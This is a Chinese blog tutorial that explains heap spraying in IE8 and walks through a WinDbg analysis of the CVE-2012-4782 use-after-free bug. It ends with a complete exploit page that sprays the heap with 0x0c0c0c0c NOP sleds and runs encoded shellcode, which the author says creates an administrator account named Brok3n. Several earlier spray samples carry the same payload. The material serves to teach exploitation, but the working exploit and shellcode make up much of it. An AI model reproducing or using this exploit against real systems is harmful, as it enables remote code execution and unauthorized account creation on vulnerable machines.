从heap spray到CVE-2012-4782 (UAF)

最新推荐文章于 2022-03-07 23:32:11 发布
最新推荐文章于 2022-03-07 23:32:11 发布
阅读量810 收藏
点赞数
分类专栏: 系统调试 文章标签: heap spray UAF CVE-2012-4782
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35519254/article/details/52948908
版权


第一部分:关于heap spray

首先在浏览器中(360、谷歌等)按F12,打开开发者模式:

 

 

在IE8+xpsp3中,打开1.html:

<html>
<body>
<script language='javascript'>
 
var myvar = "CORELAN!";
 
alert("allocation done");
 
</script>
</body>
</html>

windbg附加进程,搜索字符串“CORELAN!”:


查看字符串信息:


通过以上介绍我们可以发现字符串的length表示字符串的unicode的长度,也就是字符串.length=字符串的长度/2 一个字符串对象不仅包括字符串本身,还包括字符串前边的四个字节(表示字符串的大小)以及字符串后边的两个null字符(表示结束)。

理想的堆喷射是包括大量的nop指令(或者类nop指令,比如0x0c0c、0x1c1c等),后边跟shellcode。如下图所示:


当这么排列无限多时,无论EIP指向哪里,shellcode都有很大的概率得到执行。

用如下代码做实验:

<html>
<script >
tag = unescape('%u4F43%u4552'); // CORE
tag += unescape('%u414C%u214E'); // LAN!
chunk = '';
chunksize = 0x1000;
nr_of_chunks = 200;
for ( counter = 0; counter < chunksize; counter++)
{
chunk += unescape('%u9090%u9090'); //nops
}
chunk = chunk.substring(0,chunksize - tag.length);
all=tag+chunk;
testarray = new Array();
for ( counter = 0; counter < nr_of_chunks;counter++)
{
testarray[counter] = all.substring(0,all.length);
//testarray[counter] = tag + chunk;
}
alert("Spray done")
</script>
</html>


注:在IE8下, testarray[counter] = all.substring(0,all.length);如果改成testarray[counter]=all 或者改成 testarray[counter] =tag+chunk或者改成 testarray[counter]=tag.substring(0,tag.length)+chunk.substring(0,chunk.length)可能会出错

 

字符串还要包括字符串前边的四个字节和后边的两个字节

testarray[counter]的实际长度是0x1000*2+4+2=8198 bytes

重复200次

这样分配的内存大约是: 8198*200=1639600bytes=1.56Mb

我们使用windbg附加进程查看内存情况,

 

在内存中搜索字符串:s -a 0x00000000 L?0x7fffffff"CORELAN!"



查看地址0x0358dd84所在的堆块地址及堆大小:!heap -p -a 0x0358dd84


可以看到0x0358dd84所在的堆的首地址是0x035722f8,堆块实际大小是0x3fff8,数据的起始地址是0x03572300

我们看一下大小为0x3fff8的堆一共有几块:!heap -stat -h 0x00150000


大小为0x3fff8的堆有8块

为了减少垃圾数据的影响,我们总是希望0x2000无限接近于0x3fff8,为了实现以上目标,我们继续增大内存块。

 

将chunksize = 0x1000修改为0x4000

<html>
<script >
tag = unescape('%u4F43%u4552'); // CORE
tag += unescape('%u414C%u214E'); // LAN!
chunk = '';
chunksize = 0x4000;
nr_of_chunks = 200;
for ( counter = 0; counter < chunksize; counter++)
{
chunk += unescape('%u9090%u9090'); //nops
}
chunk = chunk.substring(0,chunksize - tag.length);
all=tag+chunk;
testarray = new Array();
for ( counter = 0; counter < nr_of_chunks;counter++)
{
testarray[counter] = all.substring(0,all.length);
//testarray[counter] = tag + chunk;
}
alert("Spray done")
</script>
</html>


 

在IE8中打开,windbg附加进程:

!heap -stat -h 0x00150000


可以看到大小为0x8fc1的堆块分配了0xcc(204)次,这和我们的数据大小0x4000*2已经非常接近了,在统计学上讲,EIP指向0x90的概率大约是:(0x4000-0x4)*2/0x8fc1*100%

 

我们继续增大内存块的大小:

将chunksize = 0x1000修改为0x10000

<html>
<script >
tag = unescape('%u4F43%u4552'); // CORE
tag += unescape('%u414C%u214E'); // LAN!
chunk = '';
chunksize = 0x10000;
nr_of_chunks = 200;
for ( counter = 0; counter < chunksize; counter++)
{
chunk += unescape('%u9090%u9090'); //nops
}
chunk = chunk.substring(0,chunksize - tag.length);
all=tag+chunk;
testarray = new Array();
for ( counter = 0; counter < nr_of_chunks;counter++)
{
testarray[counter] = all.substring(0,all.length);
//testarray[counter] = tag + chunk;
}
alert("Spray done")
</script>
</html>


在IE8中打开,windbg附加进程:

!heap -stat -h 0x00150000


这样成功的概率已经无限大了,我们看一下分配的堆块是从什么地址到什么地址:

 

从0x041bb040到0x062a7001,利用heap spray我们总是希望能覆盖0x06060606 0x0c0c0c0c、0x1c1c1c1c等地址(why,等会再说),继续增大。。。

 

将chunksize = 0x1000修改为0xfffff

<html>
<script >
tag = unescape('%u4F43%u4552'); // CORE
tag += unescape('%u414C%u214E'); // LAN!
chunk = '';
chunksize = 0xfffff;
nr_of_chunks = 200;
for ( counter = 0; counter < chunksize; counter++)
{
chunk += unescape('%u9090%u9090'); //nops
}
chunk = chunk.substring(0,chunksize - tag.length);
all=tag+chunk;
testarray = new Array();
for ( counter = 0; counter < nr_of_chunks;counter++)
{
testarray[counter] = all.substring(0,all.length);
//testarray[counter] = tag + chunk;
}
alert("Spray done")
</script>
</html>


在IE8中打开,windbg附加进程:

!heap -stat -h 0x00150000

 


这里每个堆块有0x200010大小

 

可以看到0x1c1c1c1c已经被覆盖到了

 

在每个堆块里边,是这样布局的,首先是shellcode,然后是nops指令,总大小是0x200000,我们做一下修改,里边增加一些shellcode+nops的循环,最终使内存块差不多大

<html>
<head>
<script>
 
function alloc(bytes, mystr) {
while (mystr.length<bytes) mystr += mystr;
return mystr.substr(0, (bytes-6)/2);
}
block_size = 0x1000;
padding_size = 0x5FC; //offset to 0x0c0c0c0c insideour 0x1000 hex block
Padding = '';
NopSlide = '';
 
var Shellcode =
unescape('%ud231%u30b2%u8b64%u8b12%u0c52%u528b%u8b1c%u0842%u728b%u8b20%u8012%u0c7e%u7533%u89f2%u03c7%u3c78%u578b%u0178%u8bc2%u207a%uc701%ued31%u348b%u01af%u45c6%u3e81%u6957%u456e%uf275%u7a8b%u0124%u66c7%u2c8b%u8b6f%u1c7a%uc701%u7c8b%ufcaf%uc701%u4b68%u6e33%u6801%u4220%u6f72%u2f68%u4441%u6844%u726f%u2073%u7468%u6172%u6874%u6e69%u7369%u2068%u6441%u686d%u6f72%u7075%u6368%u6c61%u6867%u2074%u6f6c%u2668%u6e20%u6865%u4444%u2620%u6e68%u2f20%u6841%u6f72%u334b%u3368%u206e%u6842%u7242%u4b6f%u7368%u7265%u6820%u7465%u7520%u2f68%u2063%u686e%u7865%u2065%u6368%u646d%u892e%ufee5%u534d%uc031%u5550%ud7ff');
 
for (p = 0; p < padding_size; p++){
Padding += unescape('%u1c1c%u1c1c');}
 
for (c = 0; c < block_size; c++){
NopSlide += unescape('%u1c1c%u1c1c');} //shellcode hou
NopSlide = NopSlide.substring(0,block_size -(Shellcode.length + Padding.length));
 
var OBJECT = Padding + Shellcode + NopSlide;
OBJECT = alloc(0xfffe0, OBJECT); // 0xfffe0 = 1mb
 
var evil = new Array();
for (var k = 0; k < 400; k++) {
evil[k] = OBJECT.substr(0, OBJECT.length);
}
alert(2);
</script>
</head>
<body>
</body>
</html>


在上述代码中,

 for (p = 0; p < padding_size;p++){
Padding += unescape('%u1c1c%u1c1c');}

使Padding=为padding_size*4*0x1c

 

for (c = 0; c < block_size; c++){
NopSlide += unescape('%u1c1c%u1c1c');}
使NopSlide=block_size*4*0x1c

 NopSlide = NopSlide.substring(0,block_size -(Shellcode.length + Padding.length));

var OBJECT = Padding + Shellcode + NopSlide;

上述两行代码使OBJECT的长度为block_size*2,OBJECT中的字符串按照%u1c1c%u1c1c.....shellcode....%u1c1c%u1c1c排列

alloc函数使字符串循环操作,最终使字符串OBJECT的长度为0xfffe0-6大小,加上字符串对象开头的四个字节和结尾的两个字节,OBJECT的长度正好是0xfffe0.

 


 


 

可以看到堆块刚好覆盖了0x06060606 0x070707070x0c0c0c0c 0x1c1c1c1c这些地址


为什么选择0x0c0c0c0c、0x1c1c1c1c这些地址呢

对UAF漏洞,一个对象的首地址中保存的是虚函数的虚表指针,当一个对象释放后,我们将这一块内存填充为0x0c0c0c0c....等,当这个释放后的对象再次被使用时,通过虚表指针查找虚函数表,这里虚表指针已经被0x0c0c0c0c填充,则虚函数表是从0x0c0c0c0c开始,比如调用调用虚函数表的第二个函数则是call [0x0c0c0c0c+4],内存地址0x0c0c0c10中保存的还是0x0c、0x0c等, 这些都是空操作指令,会一直执行下去,直到执行到我们的shellcode。

0x1c1c1c1c跟0x0c0c0c0c没有多大区别,只是内存地址越高,越稳定,垃圾数据越少。

 

下边以一个UAF漏洞CVE-2012-4782来说明问题

环境:在xpsp3+IE8中

POC.html:

<html>
<head>
<script>
        functionhelloWorld()
        {
               var e0 = null;
               var e1 = null;
               var e2 = null;
               try {
                       e0 = document.getElementById("a");
                       e1 = document.getElementById("b");
                       e2 = document.createElement("q");
                       e1.applyElement(e2);
                       alert(e1.parentNode);
                       e1.appendChild(document.createElement('button'));
                       e1.applyElement(e0);
                       e2.outerText = "";
                       e2.appendChild(document.createElement('body'));
                }
               catch(e)
               { }
               CollectGarbage();
        }
</script>
</head>
<body οnlοad="eval(helloWorld())">
<form id="a"></form>
<dfn id="b"></dfn>
</body>
</html>

 首先启用hpa+ust,命令行切换到windbg安装目录下,gflags /i iexplore.exe +hpa +ust


再启用IE,windbg附加IE,g(注意先后顺序,应该是先设置hpa+ust,后启用IE),IE打开poc.html,触发异常:


可以看到edi其实是个对象,对象的首地址保存的是虚表指针,将虚函数表的首地址传到eax,在通过偏移调用虚函数,call dword ptr [eax+4*x],

可以看到edi已经被改动,导致edi不能访问

 

由于前边设置了用户栈回溯(ust),我们看一下对这个对象edi的操作记录:


可以看到,是 button 对象释放后重用造成了访问冲突。

接下来有三个问题,什么时候创建的对象button,什么时候释放的对象button,什么时候重新利用的对象button,对于第三个问题很容易回答就是在637848ae 8b07 mov eax,dword ptr [edi] ds:0023:18266fa8=????????重用了对象button。

既然涉及到对象的创建与释放,那就查看一下创建对象的类CButton有哪些成员函数:


根据函数名字,大概知道函数mshtml!CButton::CreateElement用于创建对象,函数mshtml!CButton::`vector deleting destructor' 用于释放对象,下边对这两个函数下断,

重新启动IE,windbg附加,bp *:


IE打开poc.html,IE果然在CreateElement函数断下:


可以看到函数CreateElement通过调用API函数heapalloc在堆上分配内存,看一下函数heapalloc的定义:

LPVOID HeapAlloc(

HANDLE hHeap,

DWORD dwFlags,

SIZE_T dwBytes,

);

可以看到在进程堆上分配了一个大小为0x58的内存,在0x639944f7下断,可以看到函数heapalloc的返回值是0x17812fa8


继续运行,断在mshtml!CButton::`vector deleting destructor' ,

查看mshtml!CButton::`vector deletingdestructor'的反汇编代码:


在函数heapFree上下断,运行,查看栈信息:



第三个参数是释放的内存块的首地址,跟上边创建的一样,其实这两处就是创建对象与释放对象的地方了,继续运行,就到了 button 对象重用的地方


正好是创建对象的地址:0x17812fa8,这也正好验证了我们的猜测。

至于为什么创建、释放、再利用对象,就请详见参考资料吧

 

 

下边介绍一下利用方法:

创建的对象大小是0x58,button 对象既然被释放了,那么我们立刻申请同等大小的内存块覆盖,,当 button 重用的时候,就被欺骗去使用我们构造的数据了。

我们在申请的内存块中部署大量的0x0c、0x0c、0x0c、0x0c等,当对象中的虚函数被调用时,会首先在对象的首地址中保存虚表指针,此时虚表指针已经被0x0c0c0c0c填充,就会跳转到地址为0x0c0c0c0c的虚函数表中,此时虚函数表还是被0x0c0c0c0c填充,比如我们调用第二个虚函数,那么汇编代码为call dwordptr [eax+4*1],eax=0x0c0c0c0c,但是0x0c0c0c10还是被0x0c字符填充,这样最后0x0c字符得到执行,最终0x0c后边的shellcode得到执行。

 

首先我们申请一块大小是0x58的内存块

var arr_div = new Array();
var junk=unescape("%u0c0c%u0c0c");
while (junk.length < (0x100- 6)/2)
{
junk+=junk;
}
for(var i = 0; i<0x1; i++)
{
arr_div[i]= document.createElement("div");
arr_div[i].title= junk.substring(0,(0x58-6)/2);
}


为什么要减6呢,因为字符串前边有四个字节表示字符串的大小,后边还有两个字节0x00表示结束,加起来来正好是0x58

这个地方循环一次跟100次结果都是一样的

最终的利用代码如下:

<html>
<head>
<script>
var arr_div = new Array();
var junk=unescape("%u0c0c%u0c0c");
while (junk.length < (0x100- 6)/2)
{
junk+=junk;
}
function helloWorld() {
var e0 = null;
var e1 = null;
var e2 = null;
try {
e0 = document.getElementById("a");
e1 = document.getElementById("b");
e2 = document.createElement("q");
e1.applyElement(e2);
e1.appendChild(document.createElement('button'));
e1.applyElement(e0);
e2.outerText = "";
e2.appendChild(document.createElement('body'));
} catch(e) { }
CollectGarbage();
for(var i = 0; i<0x1; i++)
{
arr_div[i]= document.createElement("div");
arr_div[i].title= junk.substring(0,(0x58-6)/2);
}
alert(1);
function alloc(bytes, mystr) {
while (mystr.length<bytes) mystr += mystr;
return mystr.substr(0, (bytes-6)/2);
}
 
block_size = 0x1000;
padding_size = 0x5FC; //offset to 0x0c0c0c0c inside our0x1000 hex block
Padding = '';
NopSlide = '';
 
var Shellcode =
unescape('%ud231%u30b2%u8b64%u8b12%u0c52%u528b%u8b1c%u0842%u728b%u8b20%u8012%u0c7e%u7533%u89f2%u03c7%u3c78%u578b%u0178%u8bc2%u207a%uc701%ued31%u348b%u01af%u45c6%u3e81%u6957%u456e%uf275%u7a8b%u0124%u66c7%u2c8b%u8b6f%u1c7a%uc701%u7c8b%ufcaf%uc701%u4b68%u6e33%u6801%u4220%u6f72%u2f68%u4441%u6844%u726f%u2073%u7468%u6172%u6874%u6e69%u7369%u2068%u6441%u686d%u6f72%u7075%u6368%u6c61%u6867%u2074%u6f6c%u2668%u6e20%u6865%u4444%u2620%u6e68%u2f20%u6841%u6f72%u334b%u3368%u206e%u6842%u7242%u4b6f%u7368%u7265%u6820%u7465%u7520%u2f68%u2063%u686e%u7865%u2065%u6368%u646d%u892e%ufee5%u534d%uc031%u5550%ud7ff');
 
for (p = 0; p < padding_size; p++){
Padding += unescape('%u0c0c%u0c0c');}
 
for (c = 0; c < block_size; c++){
NopSlide += unescape('%u0c0c%u0c0c');} //shellcode hou
NopSlide = NopSlide.substring(0,block_size -(Shellcode.length + Padding.length));
 
var OBJECT = Padding + Shellcode + NopSlide;
OBJECT = alloc(0xfffe0, OBJECT); // 0xfffe0 = 1mb
 
var evil = new Array();
for (var k = 0; k < 400; k++) {
evil[k] = OBJECT.substr(0, OBJECT.length);
}
alert(2);
}
</script>
</head>
<body οnlοad="eval(helloWorld())">
<form id="a">
</form>
<dfn id="b">
</dfn>
</body>
</html>


shellcode是创建一个名为Brok3n的账号

执行之后,成功创建了账号:

 

边测试边参考边写的,肯定有很多不对的地方,欢迎多提意见

参考:

1.    【原创】CVE-2012-4782漏洞分析到EXP构造:http://bbs.pediy.com/showthread.php?t=206371

2.    【翻译】Windows Exploit开发系列教程第八部分:堆喷射第一节【覆写EIP】http://bbs.pediy.com/showthread.php?t=207158

3.    【翻译】Exploit 编写系列教程第十一篇:堆喷射技术揭秘(上)http://bbs.pediy.com/showthread.php?t=151381

qq_35519254
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
curl - SOCKS5 heap buffer overflow - CVE-2023-38545.pdf
10-11
"curl - SOCKS5 heap buffer overflow - CVE-2023-38545" 本文将详细介绍 curl 中的SOCKS5堆缓冲区溢出漏洞(CVE-2023-38545),包括漏洞的成因、影响范围、修复方法等。 漏洞概述 curl 是一个广泛使用的命令行...
永恒之蓝漏洞 ms17_010 详解
最新发布
qq_45953122的博客
10-25 5646
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
mysql credential_Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential
weixin_29191761的博客
01-29 280
### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and...
漏洞分析之CVE-2012-4792(UAF)
4ct10n
06-29 2468
0x00 漏洞简介 2012年9月,通用漏洞与披露平台发布了一个存在IE浏览器的UAF漏洞。 报告指出:Microsoft Internet Explorer 6至9版本中的mshtml.dll中的CMshtmlEd::Exec函数中存在释放后使用漏洞。远程攻击者可利用该漏洞通过特制的网站,执行任意代码。 0x01 测试环境操作系统:Windows XP sp3浏览器:IE 8.00.6
Heap Spray原理浅析
热门推荐
magictong的专栏
03-24 3万+
Heap Spray原理浅析 Magictong 2012/03   摘要:本文主要介绍Heap Spray的基本原理和特点、以及防范技术。 关键词:Heap Spray、溢出攻击、漏洞利用、堆溢出   Heap Spray定义基本描述 Heap Spray并没有一个官方的正式定义,毕竟这是漏洞攻击技术的一部分。但是我们可以根据它的特点自己来简单总结一下。Heap Spray是在sh
【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
做自己喜欢的事,并将其发挥到极致!
03-07 8116
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
api-ms-win-core-heap-l2-1-0.dll(32+64位都有)亲测可用
03-02
《api-ms-win-core-heap-l2-1-0.dll:操作系统核心堆管理库解析》 在Windows操作系统中,`api-ms-win-core-heap-l2-1-0.dll`是一个至关重要的动态链接库文件,它是系统核心堆管理的一部分,用于32位和64位系统。该...
api-ms-win-core-heap-l2-1-0.dll
08-29
api-ms-win-core-heap-l2-1-0.dll
api-ms-win-core-heap-l2-1-0(64-Bit).zip
11-27
《深入理解API-MS-WIN-CORE-HEAP-L2-1-0.dll:64位系统的内存管理关键组件》 在Windows操作系统中,API-MS-WIN-CORE-HEAP-L2-1-0.dll是核心堆管理库的一个重要组成部分,主要负责64位系统中的内存分配和管理。这个...
堆喷射学习笔记~
weixin_30693183的博客
07-18 1993
分析网页上数据的存储: 堆 IE6 IE7 而言, 快速(在堆块大小与重复喷射次数之间找到平衡点), 稳定(每次堆喷射都能使目标地址指向NOPS) JS 上分配字符串 会变成 BSTR字符串对象,该对象有一个 头信息 + 终止符, 并包含原始字符串经UNICODE转换后的字符串 ...
看个AV也中招之cve-2010-2553漏洞分析
jlangqi的博客
08-15 1806
试想:某一天,你的基友给你了一个视频文件,号称是陈老师拍的苍老师的老师题材的最新电影.avi,你满心欢喜,在确定文件格式确实为avi格式后,愉快的脱下裤子准备欣赏,打开后却发现什么也没有,而随后你的基友就控制了你的电脑,把你辛辛苦苦珍藏了二十年的片源全部偷走了……. 今天我们分析的漏洞就是一个利用播放器解压缩时处理不当引起的远程执行漏洞,这个漏洞并没有大规模流行,我们只是
查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
weixin_39707536的博客
12-06 1609
OpenSSH命令注入漏洞复现(CVE-2020-15778)目录漏洞描述漏洞等级漏洞影响版本漏洞复现修复建议▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。 2020年6月9日,研...
Metasploit 利用 MS17-010漏洞(永恒之蓝)
test
11-20 1万+
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166 发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS17-10(永恒之蓝) ...
CVE-2021-21972 vCenter 远程命令执行漏洞分析
爱国小白帽
02-25 6845
报告编号:B6-2021-022501 报告来源:360NoahLab 报告作者:Ricter 更新日期:2021-02-25 0x01漏洞简介 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。 vSphere Clien.
永恒之蓝ms17-010漏洞利用(提取meterpreter权限获取shell,进入windows 远程操控主机)
qq_42527761的博客
07-19 1万+
最近在学习The-Hacker-Playbook-3这本书,书中介绍的红队的第一个核心工具:Metasploit 框架,尽管 Metasploit 框架从 2003 年开发的,但它现在仍然是一个非常棒的工具。有最初的开发者 H.D. Moore 和非常活跃的社区为它提供持续支持。这个社区的驱动的框架,拥有着所有最新的公开漏洞的利用、后渗透利用模块、辅助模块等等。对于红队项目,我们可以使用 Metasploit 通过MS17-010永恒之蓝漏洞危害内部系统,以获得我们的第一个内网 shell,或者
Heap Spray Exploit : CVE-2010-0249 Use After Free 初探
太阳风的专栏
01-07 3394
1.    基础知识 Ø  Heap spray(堆喷射) 堆喷射是一种payload 传递技术,借助堆来将shellcode放置在可预测的堆地址上,然后稳定地跳入shellcode。为了实现heap spray,你需要在劫持EIP前,能够分配并填充堆内存块。意思是指在触发内存崩溃之前,你必须能够在目标程序中可分配可控内存数据。浏览器已经为此提供了一种很简单的方法,它能够支持脚本,可直接借助j
linux 内核 usbnet,Linux kernel drivers/net/usb/cdc_ncm.c拒绝服务漏洞(CVE-2016-3951)
weixin_32942557的博客
05-11 291
Linux kernel drivers/net/usb/cdc_ncm.c拒绝服务漏洞(CVE-2016-3951)发布日期:2016-04-21更新日期:2016-05-04受影响系统:Linux kernel < 4.5.2描述:CVE(CAN) ID: CVE-2016-3951Linux Kernel是Linux操作系统的内核。Linux kernel 4.5之前版本,driver...
CVE-2021-3156-main
09-09
CVE-2021-3156,也被称为"Sudo Heap-Based Buffer Overflow",是一个影响Sudo命令的漏洞。该漏洞使攻击者可以通过滥用Sudo命令的堆缓冲区溢出漏洞来获得特权访问权限。 具体来说,当在具有特权的用户身份下运行Sudo...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值